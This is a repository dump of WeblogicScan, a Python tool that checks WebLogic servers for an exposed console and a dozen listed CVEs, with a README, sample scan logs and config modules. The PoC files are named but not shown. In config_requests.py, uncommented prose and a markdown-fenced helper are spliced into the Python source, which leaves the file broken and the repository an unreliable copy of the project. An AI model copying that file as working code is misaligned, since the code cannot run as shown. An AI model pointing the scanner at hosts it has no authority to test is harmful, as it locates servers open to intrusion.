├── LICENSE
├── README.md
├── Weblogic.log
├── WeblogicScan.jpg
├── WeblogicScan.py
├── config
│   ├── config_banners.py
│   ├── config_console.py
│   ├── config_logging.py
│   └── config_requests.py
├── poc
│   ├── CVE_2014_4210.py
│   ├── CVE_2016_0638.py
│   ├── CVE_2016_3510.py
│   ├── CVE_2017_10271.py
│   ├── CVE_2017_3248.py
│   ├── CVE_2017_3506.py
│   ├── CVE_2018_2628.py
│   ├── CVE_2018_2893.py
│   ├── CVE_2018_2894.py
│   ├── CVE_2019_2725.py
│   ├── CVE_2019_2729.py
│   ├── CVE_2019_2890.py
│   ├── Console.py
│   ├── Whoareu.py
│   └── index.py
├── requirements.txt
└── target.txt

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2021 RabbitMask

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

# WeblogicScan
Weblogic one-click vulnerability detection tool, V1.5
```
Author: Tide_RabbitMask
Disclaimer: Pia!(o ‵-′)ノ”(ノ﹏<。)
This tool is for security testing only; do not use it for anything illegal. Be good~

V 1.5 feature overview:
One-click PoC detection covering almost all historical Weblogic vulnerabilities.
Details:

# Console path disclosure
Console

# SSRF:
CVE-2014-4210

# Java deserialization
CVE-2016-0638
CVE-2016-3510
CVE-2017-3248
CVE-2018-2628
CVE-2018-2893
CVE-2019-2725
CVE-2019-2729
CVE-2019-2890

# Arbitrary file upload
CVE-2018-2894

# XMLDecoder deserialization
CVE-2017-3506
CVE-2017-10271

V 1.1 changelog:
Removed all EXPs
Removed PoC: CVE-2015-4852
Added PoCs: CVE-2017-10271, CVE-2019-2725, CVE-2018-2894
Added logging
Brand-new interactive mode
New name and banner

V 1.2 changelog:
Added an offline dependency-installation mode for internal-network testing:
new folder: /whl/
Usage: python3 install.py

V 1.3 changelog:
Full Python 3 support
Rewrote PoC: CVE-2019-2725
Added PoC: CVE-2019-2729

V 1.4 changelog: [20200729]
Added PoC: CVE-2019-2890
Brand-new framework design, highly encapsulated and more natural to use
Dropped the offline installation module
Key fix: fundamentally resolved the script freezing on exceptions (caused by abnormal communication with targets of differing versions)
Key upgrade: fundamentally resolved false negatives and false positives (partly caused by the py2 -> py3 migration)
# Not the end:
People keep wondering why the CVE-2020-* checks that other tools of this kind have added never show up here.
In fact I have reproduced or written the related exploit chains and the latest EXPs myself and have nearly a complete set on hand,
but integrating them into reliable automation has always been the problem: many public chains depend on LDAP or return no echo that a regex could match on.
:) As for the purpose of the 1.4 encapsulation and framework redesign: the V1.5 batch version is coming soon, stay tuned.

V 1.5 changelog: [20200730] [Fast enough? / smug face :)]
New module: Whoareu, precise target version identification over T3
Key upgrade: added batch scanning, which handles the default port or a custom port automatically
Only successful detections are printed; see the weblogic.log log for everything else
```
Software usage demo:
===
```python WeblogicScan.py -h```
```
__        __   _     _             _        ____
\ \      / /__| |__ | | ___   __ _(_) ___  / ___|  ___ __ _ _ __
 \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \
  \ V  V /  __/ |_) | | (_) | (_| | | (__   ___) | (_| (_| | | | |
   \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_|
                             |___/
                                        By Tide_RabbitMask | V 1.5

Welcome To WeblogicScan !!!
Whoami:https://github.com/rabbitmask
usage: WeblogicScan.py [-h] [-u IP] [-p PORT] [-f FILE]

optional arguments:
  -h, --help  show this help message and exit

Scanner:
  -u IP       target ip
  -p PORT     target port
  -f FILE     target list
```
```python WeblogicScan.py -u 127.0.0.1 -p 7001```
```
__        __   _     _             _        ____
\ \      / /__| |__ | | ___   __ _(_) ___  / ___|  ___ __ _ _ __
 \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \
  \ V  V /  __/ |_) | | (_) | (_| | | (__   ___) | (_| (_| | | | |
   \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_|
                             |___/
                                        By Tide_RabbitMask | V 1.5

Welcome To WeblogicScan !!!
Whoami:https://github.com/rabbitmask
[*] =========Task Start=========
[+] [127.0.0.1:7001] Weblogic Version Is 10.3.6.0
[+] [127.0.0.1:7001] Weblogic console address is exposed! The path is: http://127.0.0.1:7001/console/login/LoginForm.jsp
[+] [127.0.0.1:7001] Weblogic UDDI module is exposed! The path is: http://127.0.0.1:7001/uddiexplorer/
[+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2016-0638
[-] [127.0.0.1:7001] weblogic not detected CVE-2016-3510
[-] [127.0.0.1:7001] weblogic not detected CVE-2017-10271
[-] [127.0.0.1:7001] weblogic not detected CVE-2017-3248
[-] [127.0.0.1:7001] weblogic not detected CVE-2017-3506
[+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2628
[+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2893
[-] [127.0.0.1:7001] weblogic not detected CVE-2018-2894
[-] [127.0.0.1:7001] weblogic not detected CVE-2019-2725
[-] [127.0.0.1:7001] weblogic not detected CVE-2019-2729
[+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2890
[*] ==========Task End==========
```
```python WeblogicScan.py -f target.txt```
```
__        __   _     _             _        ____
\ \      / /__| |__ | | ___   __ _(_) ___  / ___|  ___ __ _ _ __
 \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \
  \ V  V /  __/ |_) | | (_) | (_| | | (__   ___) | (_| (_| | | | |
   \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_|
                             |___/
                                        By Tide_RabbitMask | V 1.5

Welcome To WeblogicScan !!!
Whoami:https://github.com/rabbitmask
[*] ========Task Num: [2]========
[*] =========Task Start=========
[+] [127.0.0.1:7001] Weblogic Version Is 10.3.6.0
[+] [172.19.19.19:7001] Weblogic Version Is 10.3.6.0
[+] [127.0.0.1:7001] Weblogic console address is exposed! The path is: http://127.0.0.1:7001/console/login/LoginForm.jsp
[+] [172.19.19.19:7001] Weblogic console address is exposed! The path is: http://172.19.19.19:7001/console/login/LoginForm.jsp
[+] [127.0.0.1:7001] Weblogic UDDI module is exposed! The path is: http://127.0.0.1:7001/uddiexplorer/
[+] [172.19.19.19:7001] Weblogic UDDI module is exposed! The path is: http://172.19.19.19:7001/uddiexplorer/
[+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2016-0638
[+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2016-0638
[+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2628
[+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2628
[+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2893
[+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2893
[+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2890
[+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2890
[*] ==========Task End==========
```
```
# Demo target.txt (default port is 7001)

127.0.0.1:7001
192.168.1.1
192.168.1.1:80
```
```
# Demo Weblogic.log

2020-07-30 14:15:48,266 [+] [127.0.0.1:7001] Weblogic Version Is 10.3.6.0
2020-07-30 14:15:48,267 [+] [172.19.19.19:7001] Weblogic Version Is 10.3.6.0
2020-07-30 14:15:48,276 [+] [127.0.0.1:7001] Weblogic console address is exposed! The path is: http://127.0.0.1:7001/console/login/LoginForm.jsp
2020-07-30 14:15:48,314 [+] [172.19.19.19:7001] Weblogic console address is exposed! The path is: http://172.19.19.19:7001/console/login/LoginForm.jsp
2020-07-30 14:15:48,376 [+] [127.0.0.1:7001] Weblogic UDDI module is exposed! The path is: http://127.0.0.1:7001/uddiexplorer/
2020-07-30 14:15:48,393 [+] [172.19.19.19:7001] Weblogic UDDI module is exposed! The path is: http://172.19.19.19:7001/uddiexplorer/
2020-07-30 14:16:01,584 [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2016-0638
2020-07-30 14:16:01,598 [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2016-0638
2020-07-30 14:16:14,800 [-] [127.0.0.1:7001] weblogic not detected CVE-2016-3510
2020-07-30 14:16:14,802 [-] [172.19.19.19:7001] weblogic not detected CVE-2016-3510
2020-07-30 14:16:14,818 [-] [127.0.0.1:7001] weblogic not detected CVE-2017-10271
2020-07-30 14:16:14,821 [-] [172.19.19.19:7001] weblogic not detected CVE-2017-10271
2020-07-30 14:16:28,031 [-] [127.0.0.1:7001] weblogic not detected CVE-2017-3248
2020-07-30 14:16:28,035 [-] [172.19.19.19:7001] weblogic not detected CVE-2017-3248
2020-07-30 14:16:28,041 [-] [172.19.19.19:7001] weblogic not detected CVE-2017-3506
2020-07-30 14:16:28,048 [-] [127.0.0.1:7001] weblogic not detected CVE-2017-3506
2020-07-30 14:16:51,253 [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2628
2020-07-30 14:16:51,261 [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2628
2020-07-30 14:17:04,466 [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2893
2020-07-30 14:17:04,471 [-] [127.0.0.1:7001] weblogic not detected CVE-2018-2894
2020-07-30 14:17:04,609 [-] [127.0.0.1:7001] weblogic not detected CVE-2019-2725
2020-07-30 14:17:06,381 [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2893
2020-07-30 14:17:06,385 [-] [172.19.19.19:7001] weblogic not detected CVE-2018-2894
2020-07-30 14:17:06,553 [-] [172.19.19.19:7001] weblogic not detected CVE-2019-2725
2020-07-30 14:17:06,649 [-] [127.0.0.1:7001] weblogic not detected CVE-2019-2729
2020-07-30 14:17:08,591 [-] [172.19.19.19:7001] weblogic not detected CVE-2019-2729
2020-07-30 14:17:19,854 [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2890
2020-07-30 14:17:21,805 [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2890
```

##### Thanks for the support from [JetBrains](https://www.jetbrains.com/?from=WeblogicScan).

--------------------------------------------------------------------------------
/Weblogic.log:
--------------------------------------------------------------------------------
2020-07-30 14:15:48,266 [+] [127.0.0.1:7001] Weblogic Version Is 10.3.6.0
2020-07-30 14:15:48,267 [+] [172.19.19.19:7001] Weblogic Version Is 10.3.6.0
2020-07-30 14:15:48,276 [+] [127.0.0.1:7001] Weblogic console address is exposed! The path is: http://127.0.0.1:7001/console/login/LoginForm.jsp
2020-07-30 14:15:48,314 [+] [172.19.19.19:7001] Weblogic console address is exposed! The path is: http://172.19.19.19:7001/console/login/LoginForm.jsp
2020-07-30 14:15:48,376 [+] [127.0.0.1:7001] Weblogic UDDI module is exposed! The path is: http://127.0.0.1:7001/uddiexplorer/
2020-07-30 14:15:48,393 [+] [172.19.19.19:7001] Weblogic UDDI module is exposed! The path is: http://172.19.19.19:7001/uddiexplorer/
2020-07-30 14:16:01,584 [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2016-0638
2020-07-30 14:16:01,598 [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2016-0638
2020-07-30 14:16:14,800 [-] [127.0.0.1:7001] weblogic not detected CVE-2016-3510
2020-07-30 14:16:14,802 [-] [172.19.19.19:7001] weblogic not detected CVE-2016-3510
2020-07-30 14:16:14,818 [-] [127.0.0.1:7001] weblogic not detected CVE-2017-10271
2020-07-30 14:16:14,821 [-] [172.19.19.19:7001] weblogic not detected CVE-2017-10271
2020-07-30 14:16:28,031 [-] [127.0.0.1:7001] weblogic not detected CVE-2017-3248
2020-07-30 14:16:28,035 [-] [172.19.19.19:7001] weblogic not detected CVE-2017-3248
2020-07-30 14:16:28,041 [-] [172.19.19.19:7001] weblogic not detected CVE-2017-3506
2020-07-30 14:16:28,048 [-] [127.0.0.1:7001] weblogic not detected CVE-2017-3506
2020-07-30 14:16:51,253 [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2628
2020-07-30 14:16:51,261 [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2628
2020-07-30 14:17:04,466 [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2893
2020-07-30 14:17:04,471 [-] [127.0.0.1:7001] weblogic not detected CVE-2018-2894
2020-07-30 14:17:04,609 [-] [127.0.0.1:7001] weblogic not detected CVE-2019-2725
2020-07-30 14:17:06,381 [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2018-2893
2020-07-30 14:17:06,385 [-] [172.19.19.19:7001] weblogic not detected CVE-2018-2894
2020-07-30 14:17:06,553 [-] [172.19.19.19:7001] weblogic not detected CVE-2019-2725
2020-07-30 14:17:06,649 [-] [127.0.0.1:7001] weblogic not detected CVE-2019-2729
2020-07-30 14:17:08,591 [-] [172.19.19.19:7001] weblogic not detected CVE-2019-2729
2020-07-30 14:17:19,854 [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2890
2020-07-30 14:17:21,805 [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2890

--------------------------------------------------------------------------------
/WeblogicScan.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rabbitmask/WeblogicScan/05cee3a69cf403e4db5f057c569a923c107cb97b/WeblogicScan.jpg

--------------------------------------------------------------------------------
/WeblogicScan.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_

'''
 ____       _     _     _ _   __  __           _
|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\

'''
from config.config_banners import banner
from config.config_console import Weblogic_Console


def run():
    print(banner)
    print('Welcome To WeblogicScan !!!\nWhoami:https://github.com/rabbitmask')
    Weblogic_Console()

if __name__ == '__main__':
    run()

--------------------------------------------------------------------------------
/config/config_banners.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
 ____       _     _     _ _   __  __           _
|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
'''
version = "1.5"
banner='''
__        __   _     _             _        ____
\ \      / /__| |__ | | ___   __ _(_) ___  / ___|  ___ __ _ _ __
 \ \ /\ / / _ \ '_ \| |/ _ \ / _` | |/ __| \___ \ / __/ _` | '_ \
  \ V  V /  __/ |_) | | (_) | (_| | | (__   ___) | (_| (_| | | | |
   \_/\_/ \___|_.__/|_|\___/ \__, |_|\___| |____/ \___\__,_|_| |_|
                             |___/
                                        By Tide_RabbitMask | V {}
'''.format(version)

--------------------------------------------------------------------------------
/config/config_console.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
 ____       _     _     _ _   __  __           _
|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
'''
import argparse

from config.config_logging import loglog
from multiprocessing import Pool, Manager
from poc.index import *

def pocbase(pocname,rip,rport):
    # pocindex holds PoC module names; resolve them in this module's namespace
    # (filled by the star import above) instead of passing the string to eval().
    try:
        tmp,res=globals()[pocname].run(rip,rport)
        return (tmp,res)
    except Exception:
        # A PoC that cannot connect or cannot parse the reply yields no result.
        return None

def poc(rip,rport):
    print ("[*] =========Task Start=========")
    for i in pocindex:
        res=pocbase(i,rip,rport)
        if res:
            loglog(res[1])
            print(res[1])
    print ("[*] ==========Task End==========")

def pocs(rip,rport,q):
    try:
        for i in pocindex:
            res=pocbase(i,rip,rport)
            if res:
                loglog(res[1])
                if res[0]==1:
                    print(res[1])
    except Exception:
        print ("[-] [{}] Weblogic Network Is Abnormal ".format(rip+':'+str(rport)))
        # Queue the failed target as one (ip, port) item; q.put(rip, rport)
        # would hand rport to Queue.put() as its `block` argument.
        q.put((rip,rport))


def poolmana(filename):
    with open(filename,'r') as fr:
        url=fr.readlines()
    print ("[*] ========Task Num: [{}]========".format(len(url)))
    print ("[*] =========Task Start=========")
    p = Pool(10)
    q = Manager().Queue()
    for i in url:
        i=i.replace('\n','')
        if ':' in i:
            ip=i.split(':')[0]
            port=int(i.split(':')[1])
            p.apply_async(pocs, args=(ip,port,q,))
        else:
            ip=i
            port=7001
            p.apply_async(pocs, args=(ip,port,q,))
    p.close()
    p.join()
    print ("[*] ==========Task End==========")


def Weblogic_Console():
    parser = argparse.ArgumentParser()
    scanner = parser.add_argument_group('Scanner')

    scanner.add_argument("-u",dest='ip', help="target ip")
    scanner.add_argument("-p", dest='port', help="target port")
    scanner.add_argument("-f", dest='file', help="target list")

    args = parser.parse_args()

    if args.ip and args.port:
        try:
            poc(args.ip,int(args.port))
        except ConnectionRefusedError:
            print("[-] [{}] Weblogic Network Is Abnormal ".format(args.ip + ':' + str(args.port)))
            print("[*] ==========Task End==========")
    elif args.file:
        poolmana(args.file)
    else:
        parser.print_help()

--------------------------------------------------------------------------------
/config/config_logging.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
 ____       _     _     _ _   __  __           _
|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
'''
import logging

logging.basicConfig(filename='Weblogic.log',
                    format='%(asctime)s %(message)s',
                    filemode="a", level=logging.INFO)

def loglog(log):
    logging.info(log)

--------------------------------------------------------------------------------
/config/config_requests.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
 ____       _     _     _ _   __  __           _
|  _ \ __ _| |__ | |__ (_) |_|  \/  | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
|  _ < (_| | |_) | |_) | | |_| |  | | (_| \__ \   <
|_| \_\__,_|_.__/|_.__/|_|\__|_|  |_|\__,_|___/_|\_\
'''
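The two formats the scanner consumes and produces are defined in the files above: config_console.py's poolmana() accepts a target list of "ip" or "ip:port" lines (port 7001 when omitted), and config_logging.py's loglog() writes every PoC result to Weblogic.log as "<timestamp> [+|-] [ip:port] <message>". The following helper is an added example, not code from the WeblogicScan project: it parses both formats so a defender can validate a target list before a scan and group the log's findings per host afterwards. The function names, the handling of blank and "#" comment lines, the port-range check and the embedded sample data are assumptions made for this example; the sample lines are copied from the README's demo target.txt and Weblogic.log.

```python
"""Defender-side helpers for WeblogicScan's target list and Weblogic.log
(added example, not part of the project)."""
import re
from collections import defaultdict

DEFAULT_PORT = 7001  # the port poolmana() assumes when a line has no ":port"


def parse_targets(text):
    """Return [(host, port), ...] from target.txt-style text.

    Assumed extensions over poolmana(): blank lines and '#' comments are
    skipped, and a non-numeric or out-of-range port raises ValueError
    instead of being handed to the scanner."""
    targets = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        if ':' in line:
            host, port_str = line.rsplit(':', 1)
            port = int(port_str)  # ValueError on junk, as int() does in poolmana()
            if not 1 <= port <= 65535:
                raise ValueError('port out of range in target line: %r' % raw)
        else:
            host, port = line, DEFAULT_PORT
        targets.append((host, port))
    return targets


# One result line as written by the logging format '%(asctime)s %(message)s'
LOG_RE = re.compile(r'^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d,\d{3}) '
                    r'\[(?P<flag>[+\-*])\] \[(?P<target>[^\]]+)\] (?P<msg>.*)$')
CVE_RE = re.compile(r'CVE-\d{4}-\d{4,}')


def summarize_log(text):
    """Group Weblogic.log lines per target.

    Returns {target: {'version': str or None, 'exposed': [path, ...],
                      'detected': [CVE, ...], 'not_detected': [CVE, ...]}}."""
    summary = defaultdict(lambda: {'version': None, 'exposed': [],
                                   'detected': [], 'not_detected': []})
    for raw in text.splitlines():
        m = LOG_RE.match(raw.strip())
        if not m:
            continue  # banner or other non-result line
        entry = summary[m.group('target')]
        msg = m.group('msg')
        cve = CVE_RE.search(msg)
        if m.group('flag') == '+':
            if 'Version Is' in msg:
                entry['version'] = msg.split('Version Is', 1)[1].strip()
            elif 'The path is:' in msg:
                entry['exposed'].append(msg.split('The path is:', 1)[1].strip())
            elif cve:
                entry['detected'].append(cve.group(0))
        elif cve:
            entry['not_detected'].append(cve.group(0))
    return dict(summary)


# Constructed sample inputs, copied from the README's demo target.txt and log.
SAMPLE_TARGETS = "127.0.0.1:7001\n192.168.1.1\n192.168.1.1:80\n"
SAMPLE_LOG = """\
2020-07-30 14:15:48,266 [+] [127.0.0.1:7001] Weblogic Version Is 10.3.6.0
2020-07-30 14:15:48,276 [+] [127.0.0.1:7001] Weblogic console address is exposed! The path is: http://127.0.0.1:7001/console/login/LoginForm.jsp
2020-07-30 14:16:01,584 [+] [127.0.0.1:7001] weblogic has a JAVA deserialization vulnerability:CVE-2016-0638
2020-07-30 14:16:14,800 [-] [127.0.0.1:7001] weblogic not detected CVE-2016-3510
2020-07-30 14:17:06,553 [-] [172.19.19.19:7001] weblogic not detected CVE-2019-2725
2020-07-30 14:17:21,805 [+] [172.19.19.19:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2890
"""

if __name__ == '__main__':
    print(parse_targets(SAMPLE_TARGETS))
    for target, info in sorted(summarize_log(SAMPLE_LOG).items()):
        print(target, info)
```

Because the scanner only prints "[+]" results to the console in batch mode, the log is the complete record; summarize_log() keeps the "[-]" lines too, so a host with a detected deserialization CVE and an exposed console path is easy to pick out for patching and for putting the T3 and /console paths behind a filter.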

# from fake_useragent import UserAgent
#
# # Instantiate the UserAgent class
# ua = UserAgent(verify_ssl=False)
#
# # Common headers configuration
# headers={"User-Agent":ua.random}
#
# if __name__ == '__main__':
#     print(headers)

import random

ua=random.choice([
    "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
    "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36",
    "Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
    "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
